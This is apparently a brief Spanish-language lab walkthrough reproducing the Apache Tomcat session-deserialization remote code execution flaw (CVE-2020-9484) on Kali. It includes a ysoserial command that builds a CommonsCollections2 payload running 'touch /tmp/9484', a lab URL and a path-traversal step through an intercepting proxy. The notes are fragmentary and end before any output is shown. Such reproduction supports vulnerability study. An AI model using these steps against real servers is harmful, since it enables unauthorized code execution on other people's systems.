
Reproducción de la vulnerabilidad de ejecución de código por deserialización de sesión de Apache Tomcat usando Kali 2.0
Reproducción de la vulnerabilidad de ejecución de código por deserialización de sesión de Apache Tomcat CVE-2020-9484 con Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Primero accede a S2-053 para comprobar si se inició correctamente:
http://192.168.152.128:8080/s2-053/
Vuelve a capturar el paquete, usa intruder para path traversal


Ejecución del comando exitosa:
